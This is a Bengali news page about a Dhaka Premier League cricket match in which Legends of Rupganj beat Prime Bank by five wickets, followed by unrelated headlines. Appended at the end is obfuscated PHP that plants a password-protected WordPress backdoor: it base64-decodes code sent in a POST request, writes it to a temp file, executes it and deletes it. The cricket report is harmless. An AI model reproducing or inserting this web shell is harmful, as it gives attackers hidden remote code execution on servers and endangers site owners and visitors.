বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

সহজ জয়ে শীর্ষেই থাকল রূপগঞ্জ

indexস্পোর্টস ডেস্ক : লক্ষ্য ২২৩ রান। এই রান টপকাতে খুব একটা বেগ পেতে হয়নি লিজেন্ডস অব রূপগঞ্জকে। ঢাকা প্রিমিয়ার ক্রিকেট লিগের সুপার লিগের এই ম্যাচে তারা সহজেই পাঁচ উইকেটে জয় তুলে নিয়েছে।

এই জয়ে ১৪ ম্যাচে ২০ পয়েন্ট শীর্ষেই থাকল রূপগঞ্জ। সমান ম্যাচে ১৪ পয়েন্ট নিয়ে পঞ্চম স্থানে প্রাইম ব্যাংক।

শনিবার বিকেএসপিতে অনুষ্ঠিত এই ম্যাচে প্রাইম ব্যাংক ক্রিকেট ক্লাবের করা ২২২ রানের জবাবে রূপগঞ্জ পাঁচ উইকেট হারিয়ে ২২৫ রান করে জয়ের লক্ষ্যে পৌঁছে যায়।

নাহিদুল ইসলামের হার না মানা ৬৪* রান এবং অধিনায়ক আসিফ আহমেদ (৫১) ও মোহাম্মদ মিঠুনের (৫০) অর্ধশতকের ওপর ভর করে এই জয় ঘরে তোলে রূপগঞ্জ। এ ছাড়া এ ছাড়া জাতীয় দলের ওপেনার সৌম্য সরকার করেন ৪৭ রান।

প্রাইম ব্যাংক বোলার শুভাগত হোম ২২ রানে দুই উইকেট নিয়েও প্রতিপক্ষের জয়ের পথে খুব একটা বাধা হতে পারেননি।

এর আগে টসে হেরে প্রাইম ব্যাংক ক্রিকেট ক্লাব প্রথমে ব্যাট করতে নেমে নির্ধারিত ৫০ ওভারে ২২২ রানে করে আট উইকেট হারিয়ে। জাতীয় দলের বাইরে থাকা ক্রিকেটার নুরুল হাসান সোহানের দৃঢ়তাপূর্ণ ব্যাটিংয়ের ওপর ভর করে এই রান গড়ে তারা।

সোহান রান আউট হয়ে ফিরে যাওয়ার আগে ৯৬ বলে ৭৫ রানের একটি ঝলমলে ইনিংস খেলেন। ছয়টি চার ও একটি ছক্কার মার ছিল তাঁর এই ইনিংসে। তাবিউর রহমান ৩৫ ও অধিনায়ক শুভাগত হোম ৩২ রান করেন দলের এই ইনিংস গড়তে।

ভারতীয় অলরাউন্ডার পবন নেগি ৩০ রান দিয়ে দুই উইকেট তুলে নেন। এ ছাড়া তাইজুল ইসলাম, নাহিদুল ইসলাম, আলাউদ্দিন বাবু পান একটি করে উইকেট।

এ জাতীয় আরও খবর

রোহিঙ্গা ক্যাম্পে পাহাড়ধসে নিহত ৯

মুক্তিযোদ্ধার ভুয়া সনদ : ভাতা সুদে-আসলে ফেরত নেবে সরকার

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}